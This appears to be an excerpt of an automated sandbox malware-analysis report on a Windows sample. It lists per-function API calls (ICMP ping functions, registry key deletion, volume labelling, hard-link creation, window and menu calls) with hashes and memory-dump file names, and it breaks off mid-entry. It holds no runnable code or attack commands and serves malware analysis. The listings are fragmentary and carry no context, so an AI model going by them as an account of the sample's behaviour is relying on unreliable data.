                                                                        • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                        • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                        • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                        • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                        APIs
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                        • String ID: crts
                                                                        • API String ID: 943502515-3724388283
                                                                        • Opcode ID: 6bd881ada2ae8ff0a5326c51e5497572252972d1a55ad2f97464bff4f718433f
                                                                        • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                        • Opcode Fuzzy Hash: 6bd881ada2ae8ff0a5326c51e5497572252972d1a55ad2f97464bff4f718433f
                                                                        • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                        • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                        • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$LabelVolume
                                                                        • String ID: \VH
                                                                        • API String ID: 2006950084-234962358
                                                                        • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                        • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                        • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                        • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                        APIs
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • GetMenuItemInfoW.USER32 ref: 00449727
                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                        • DrawMenuBar.USER32 ref: 00449761
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$InfoItem$Draw_malloc
                                                                        • String ID: 0
                                                                        • API String ID: 772068139-4108050209
                                                                        • Opcode ID: c51535a36009e0b84663db87369d5282580437b440f7bb88edfbca7c2865f555
                                                                        • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                        • Opcode Fuzzy Hash: c51535a36009e0b84663db87369d5282580437b440f7bb88edfbca7c2865f555
                                                                        • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$_wcscpy
                                                                        • String ID: 3, 3, 8, 1
                                                                        • API String ID: 3469035223-357260408
                                                                        • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                        • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                        • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                        • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                        • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: ICMP.DLL$IcmpCloseHandle
                                                                        • API String ID: 2574300362-3530519716
                                                                        • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                        • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                        • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                        • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                        • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: ICMP.DLL$IcmpCreateFile
                                                                        • API String ID: 2574300362-275556492
                                                                        • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                        • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                        • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                        • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                        • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: ICMP.DLL$IcmpSendEcho
                                                                        • API String ID: 2574300362-58917771
                                                                        • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                        • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                        • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                        • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                        • API String ID: 2574300362-4033151799
                                                                        • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                        • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                        • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                        • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                        • VariantClear.OLEAUT32(?), ref: 00479650
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                        • String ID:
                                                                        • API String ID: 2808897238-0
                                                                        • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                        • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                        • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                        • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                        • __itow.LIBCMT ref: 004699CD
                                                                          • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                        • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                        • __itow.LIBCMT ref: 00469A97
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$__itow
                                                                        • String ID:
                                                                        • API String ID: 3379773720-0
                                                                        • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                        • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                        • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                        • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                        • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientMoveRectScreen
                                                                        • String ID:
                                                                        • API String ID: 3880355969-0
                                                                        • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                        • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                        • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                        • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                        • String ID:
                                                                        • API String ID: 2782032738-0
                                                                        • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                        • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                        • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                        • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                        APIs
                                                                        • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                        • GetWindowRect.USER32(?,?), ref: 00441722
                                                                        • PtInRect.USER32(?,?,?), ref: 00441734
                                                                        • MessageBeep.USER32(00000000), ref: 004417AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 1352109105-0
                                                                        • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                        • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                        • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                        • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                        APIs
                                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                        • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                        • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                        • String ID:
                                                                        • API String ID: 3321077145-0
                                                                        • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                        • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                        • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                        • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                        APIs
                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                        • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                        • String ID:
                                                                        • API String ID: 3058430110-0
                                                                        • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                        • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                        • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                        • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 004503C8
